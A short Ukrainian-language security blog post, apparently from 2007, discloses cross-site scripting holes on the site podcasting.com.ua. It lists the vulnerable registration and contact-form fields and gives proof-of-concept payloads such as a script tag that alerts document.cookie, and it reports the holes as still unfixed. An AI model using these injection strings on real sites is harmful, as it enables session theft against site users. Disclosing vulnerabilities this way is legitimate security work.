Уразливості на podcasting.com.ua
19:42 11.10.200721.05.2007
У січні, 04.01.2007, я знайшов чимало Cross-Site Scripting уразливостей на проекті http://podcasting.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.
Детальна інформація про уразливості з’явиться пізніше.
11.10.2007
XSS:
POST запит на сторінці http://podcasting.com.ua/wp-register.php:
"><script>alert(document.cookie)</script>
В полі: E-Mail.
XSS:
POST запит на сторінці http://podcasting.com.ua/kontakt/:
"><script>alert(document.cookie)</script>
В полях: Ваше имя, E-mail, Ваш веб-сайт.
</textarea><script>alert(document.cookie)</script>
В полі: Сообщение.
Дані уразливості досі не виправлені.